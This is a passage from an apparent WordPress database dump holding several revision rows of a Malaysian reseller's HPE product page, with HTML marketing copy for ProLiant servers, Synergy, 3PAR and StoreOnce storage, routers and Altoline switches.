6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:29:36','2019-10-01 09:29:36','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3636,1,'2019-10-01 17:33:09','2019-10-01 09:33:09','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:33:09','2019-10-01 09:33:09','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3634,1,'2019-10-01 17:30:50','2019-10-01 09:30:50','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:30:50','2019-10-01 